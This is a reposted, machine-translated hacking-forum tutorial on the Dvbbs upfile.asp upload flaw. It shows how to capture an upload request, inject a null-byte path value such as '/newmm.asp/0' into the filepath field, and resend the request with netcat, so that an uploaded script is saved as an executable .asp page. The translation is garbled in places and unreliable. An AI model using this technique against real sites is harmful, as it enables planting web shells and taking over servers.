Bookmark articles about uploading vulnerabilities, I have been having this problem recently.
Author: szjwwwwww
From: Black Hawk Base Forum
http://www.3800cc.com
1. Write it in front
***The principle of this upload vulnerability is only for the asp and php scripts uploaded in form format***
NC(Netcat)
Used to submit data packets
Run under the DOS interface:
NC-vvwww.***.com80<1.txt
-vv:Echo
80:www port
1.txt: It is the data packet you want to send
(For more usage methods, please check the posts in this area)
WSE(WSockExpert)
Monitoring the native port and grab data packets submitted by IE
(If you don’t know how to use it, just search for more information online by yourself)
Second, the principle of vulnerability
The premise of hypothesis of the following example
wwwhost: www.***.com;
bbs path:/bbs/
The vulnerability originates from the research on uploading files on the Internet. It is recommended that you have some programming experience.
Look at the upfile.asp file of Dvbbs, there is no need to understand it all
Upfile is uploaded by generating a form table.
Variables used:
filepath default value uploadface attribute hiden
act default value upload attribute hiden
file1 is the file you want to pass
The key is the filepath variable!
By default, our files are uploaded to www.***.com/bbs/uploadface/
The file is named after your upload time, which is the sentence in the upfile
FileName=FormPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&FileExt
-------------------------------------------------------------------------
We know that the data in the computer is a "/0" for Peugeot. Those who have used C language know that
chardata[]="bbs"
The length of this data array is 4:bbs/0
What happens if we construct the filepath as follows?
filepath="/newmm.asp/0"
The files we pass on 2004.09.24.08.24 will change
When there is no change:
http://www.***.com/bbs/uploadface/200409240824.jpg
When using the filepath we constructed:
http://www.***.com/newmm.asp/0/200409240824.jpg
In this way, when the server receives filepath data, /0 after newmm.asp is detected
It's understood that the filepath data ends
In this way, the files we upload, such as c:/1.asp
Save it as: http://www.***.com/newmm.asp
3. Later additions
After the vulnerability was announced, many websites have done corresponding processing, but filepath filtering and processing are not possible.
There are many websites that just add N hidden attribute variables to deal with the upfile.exe published online.
Upload exploit tool or filepath variable exploit tool (veteran's)... But the most basic one has not been changed. .
And there are similar vulnerabilities in the website plug-ins. What I want to say should not rely on special tools
Change the filepath variable in the package caught by WSE by yourself, and then submit it in NC. . .
Even if he adds N hidden variables, it will be useless.
Of course, if filepath is strictly filtered, our theories will end